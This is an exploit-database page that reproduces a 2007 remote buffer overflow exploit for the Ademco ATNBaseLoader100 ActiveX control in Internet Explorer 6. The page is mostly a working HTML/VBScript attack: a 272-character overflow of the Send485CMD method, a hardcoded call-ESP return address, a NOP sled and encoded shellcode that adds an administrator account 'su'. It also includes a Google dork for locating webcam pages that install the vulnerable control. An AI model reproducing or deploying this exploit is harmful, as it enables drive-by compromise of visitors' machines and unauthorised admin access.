header-logo
Suggest Exploit
vendor:
ATNBaseLoader100 Module
by:
rgod
7.5
CVSS
HIGH
Buffer Overflow
CWE
Product Name: ATNBaseLoader100 Module
Affected Version From: 5.4.0.6
Affected Version To: 5.4.0.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2

Remote Buffer Overflow Exploit in ATNBaseLoader100.dll

This exploit targets a remote buffer overflow vulnerability in the ATNBaseLoader100.dll module, version 5.4.0.6. It can be triggered by passing 272 characters to the Send485CMD method, causing the EIP to be overwritten. The SetLoginID, AddSite, SetScreen, and SetVideoServer methods are also vulnerable to less convenient overflows or seh overwrite.

Mitigation:

Source

Exploit-DB raw data:

<!--
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version
by rgod
site: retrogod.altervista.org

this activex is installed browsing some webcam pages
try this google dork:

intitle:"Browser Launch Page"
(dork credit: dragg, found in GHDB)

object safety report:

RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False

here it is what happen, EIP is overwritten after 272 chars passed to
Send485CMD method:

EAX 00000001
ECX 0013EA7C ASCII "AAAA ...
EDX 7EFF00E4
EBX 10007414
ESP 0013EB98 ASCII "AAAA ...
EBP 41414141
ESI 0018022C
EDI 00000000
EIP 41414141

SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
to less convenient overflows or seh overwrite
-->
<HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'>

'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll

SunTzu=String(272, "A") + EIP + NOP + SCODE

BaseRunner.Send485CMD SunTzu

</script>
</HTML>

# milw0rm.com [2007-05-26]

Navigation

Suggest Exploit

Services By CQR